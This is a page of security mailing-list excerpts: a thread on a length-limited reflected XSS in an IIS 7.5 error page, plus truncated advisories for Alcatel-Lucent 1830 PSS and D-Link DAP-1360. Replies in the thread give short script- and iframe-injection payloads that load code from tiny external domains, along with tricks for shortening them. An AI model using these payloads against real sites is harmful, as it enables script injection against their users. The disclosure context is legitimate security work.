Re: XSS (in 20 chars) in Microsoft IIS 7.5 error message

Posted by Mark Steward on Dec 03

I’ve spotted this before and ignored it because it’s all HTML-escaped. You
can actually put as much as you like before the equals, presumably
including script tags. You can also include enough after the equals to
write something like “<iframe src=//xy.co>”.

Where are you seeing it unescaped? Is it some third-party handler? Try on a
clean install with just an empty .aspx and a web.config with an empty
configuration…

Re: XSS (in 20 chars) in Microsoft IIS 7.5 error message

Posted by James Hooker on Dec 03

You could skip the schema on any includes, and just use ‘//’. That will
then use the schema provided in the original URL. That will save you 4
characters at least. You can also skip most quotes in tags – that will save
you a few more characters. Link shortening services might also be of use,
however one that generates links short enough might be hard to come by –
more likely, you’ll need a 3 character domain, with a 2 character…

Re: XSS (in 20 chars) in Microsoft IIS 7.5 error message

Posted by A Z on Dec 03

Thank you all for the replies,

Unfortunately, I can no longer really test this (it was on some internal
network, so for example link shortening wouldn’t work), but I wanted to
know if anyone had encountered this stuff before. I should try on a clean
install as suggested – if it works I’ll let you know.

For some unknown reason there was no HTML encoding in this error response,
however the payload was truncated to 20 chars. I googled it…

Re: XSS (in 20 chars) in Microsoft IIS 7.5 error message

Posted by waysea on Dec 03

If you can get a <script> tag in (usually the very first tag to be
blacklisted), you could
1. register a two character domain with a two character TLD (all the
single character domains with two letter TLDs had been taken the last
time I checked)
2. have the root page be an index.js file (instead of index.html)
3. use something like:

A) <script src=//ab.cd>
or
B) <script/src=//ef.gh>

Without knowing more about your specific…

CVE-2014-3809: Reflected XSS in Alcatel Lucent 1830 PSS-32/16/4

Posted by Stephan.Rickauer on Dec 03

#############################################################
#
# SWISSCOM CSIRT ADVISORY – http://www.swisscom.com/security
#
#############################################################
#
# CVE ID: CVE-2014-3809
# Product: 1830 Photonic Service Switch PSS-32/16/4
# Vendor: Alcatel-Lucent
# Subject: Reflected Cross-site Scripting – XSS
# Effect: Remotely exploitable
# Author: Stephan Rickauer (stephan.rickauer _at_ swisscom.com)
#…

CSRF and XSS vulnerabilities in D-Link DAP-1360

Posted by MustLive on Dec 03

Hello list!

There are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

These are in addition to the Abuse of Functionality, Brute Force, Information
Leakage, Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities
in DAP-1360 which I wrote about earlier.

-------------------------
Affected products:
-------------------------

The following model is vulnerable: D-Link…